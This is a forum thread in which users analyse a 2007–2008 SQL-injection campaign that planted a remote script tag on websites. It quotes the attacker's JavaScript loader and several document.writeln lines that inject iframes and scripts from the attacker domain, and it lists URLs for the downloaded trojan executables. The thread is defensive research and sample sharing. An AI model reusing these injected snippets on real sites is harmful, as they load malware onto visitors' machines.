Hello, I would like to ask if anyone can advise or enlighten me a little more.

Currently, if you type "src=http://c.uc8010.com/0.js>" into google, many references will come up.

It seems web pages on these sites have this code.

The site I have experienced recently had huge amounts of database text replaced with this string.

They have just apparently completed a system restore to a period of a week or two ago.

Below is what I could find out about it.

Hi, I have just discovered a social networking website I have been using with some unusal happenings.

Text and blogs being replaced with this,

src=http://c.uc8010.com/0.js>

The main URL only shows OK and a smile.

The full URL attempts to load a Java script file.

Below is the data I sent to the social networking site a few minutes ago.


-------------------------------------------
I have come across more information regarding the java script,

It was first identified by the Chinese on Dec 31 2007, it appeared in a western reference a few days later.
It is an SQL attack. There are now thousands of infected sites, most commercial. It is more than likely coming in with ads and banners from these sites.

See these refereneces for a little more information.

Original reference in Chinese.
http://www.itis.tw/malicious_url/2587

The same page above translated by Google.
http://translate.google.com/translate?hl=en&sl=zh-TW&u=http://www.itis.tw/malicious_url/2587&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3Dhttp://c.uc8010.com/0.js%253E%2Bvirus%26start%3D10%26hl%3Den%26sa%3DN

This may give some tech ideas as to elimination.
Translated from Chinese.
http://72.14.203.104/translate_c?hl=en&u=http://rogerspeaking.blogspot.com/2007/12/d-link.html&prev=/search%3Fq%3Dhttp://c.uc8010.com/0.js%253E%2Bvirus%26start%3D10%26hl%3Den%26sa%3DN

The reference mentioned for the first time in English.
http://www.sitepoint.com/forums/showthread.php?p=3672170


Also, you may continue to get re-infected from your ad feeds and infected users.

If anyone may comment further please.
Hoping this is of some assistance to any one experiencing the same.
K.

The site with the .js file on it seems to be down.

If you still have a sample of the malware please can you add it to a zip file and upload it as an attachment to this post.

I sent it to Kaspersky, their reply was that "No malicious software was found in the attached file."

Hello again, the main site is still active.
I typed the URL into my browser (IE) and it got diverted to some windows live search page??? I hate that, stop trying to think for me.

I did it again, then I got it, I saved the js file, below are the contents.




function setCookie(name,value)
{
var Days = 1;
var exp = new Date();
exp.setTime(exp.getTime() + Days*1*60*60*1000);//Days*24*60*60*1000;
document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
function getCookie(name)
{
var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
if(arr != null)
{
return unescape(arr[2]);
}
else
{
document.writeln("<script src=http:\/\/c.uc8010.com\/0\/w.js><\/script>");
// document.writeln("<iframe src=\"http:\/\/c.uc8010.com\/ip\/Cip.aspx\" width=\"20\" height=\"0\" scrolling=\"no\" frameborder=\"0\"><\/iframe>");
setCookie("Lin","ok");
return null;
}
}
getCookie("





I do not understand java, the site that had a great pile of blog text replaced was Yuwie, they seem to be OK at the moment.

Say I had written 25 lines of text and posted it, there would be 1 line, with src=http://c.uc8010.com/0.js>
at the end.
K.

The post above, I tried to add the o.js file, but didn't zip it, the zip is attached to this file.

Thanks for uploading the file.

Is anybody able to download either of thses files?

(First link)

That link was dead the last time I checked, looks like there is a malicious script there now.

Tries to download

Opens iframes/scripts

document.writeln("<iframe src=hxxp:\/\/c.uc8010.com\/1.html width=1 height=0><\/iframe>");
document.writeln("<script src=\'hxxp:\/\/s106.cnzz.com\/stat.php?id=742266&web_id=742266\' language=\'JavaScript\' charset=\'gb2312\'><\/script>");
document.writeln("<script src=\'hxxp:\/\/c.uc8010.com\/0\/007.js\' language=\'JavaScript\'><\/script>");

hxxp://c.uc8010.com/0/1.exe and 19.exe


Also, one of the iframes leads to

hxxp://ftpgen2008.521066.com/aawowuiq/

Where

<script src=06014.js></script>
<script src=real.js></script>
<script src=07055.js></script>
<script src=yahoo.js></script>

are downloaded

Second link for me simply downloads "Hello" and nothing else.


I've just had a quick look round, there is probably a lot more than that.

I have zipped up the scripts/iframes/.exes and am attaching to this post.

Heya, on the EXE files, i ran a sandbox on them both, here are the results:

1.exe: http://analysis.seclab.tuwien.ac.at/result.php?taskid=052eb4a3601b96a4e9a5f8d7c46feb33

load.exe: http://analysis.seclab.tuwien.ac.at/result.php?taskid=e107fc4746d56cf4dd1725c5ffd35d6d

By what it seems, 1.exe is the payload of the entire thing. However it makes two more additional files on run. Getting those files would help out.

Kaspersky have analysed those files and found the following:

06014.js_ - Trojan-Downloader.JS.Psyme.xn
07055.js_ - Trojan-Downloader.JS.Agent.ats,
load.exe_ - Trojan.Win32.Pakes.bxl,
real.js_ - Exploit.Win32.RealPlr.s,
w.js_ - Trojan-Downloader.JS.Agent.auk,
yahoo.js_ - Trojan-Downloader.JS.Agent.atr

Thanks for uploading all the files. I'll add the new ones to the malware listserv.

When the javascript is ran from a website it also downloads hxxp://www.worldofwarcraftn.com/1.exe. The website is down now, but I have a copy of the file. Should I zip it up and attach it?

Amrodg

I was able to download 1.exe from the site but it doesn't appear to contain any malware.

Just incase I have a different version could you add the file to a .zip file and upload it as an attachment to this post?

Attached the 1.exe. When it is run it places the dll that is included in the zip file into the Windows directory.

Thanks for uploading the files, they are both well detected so I didn't add them to the malware listserv.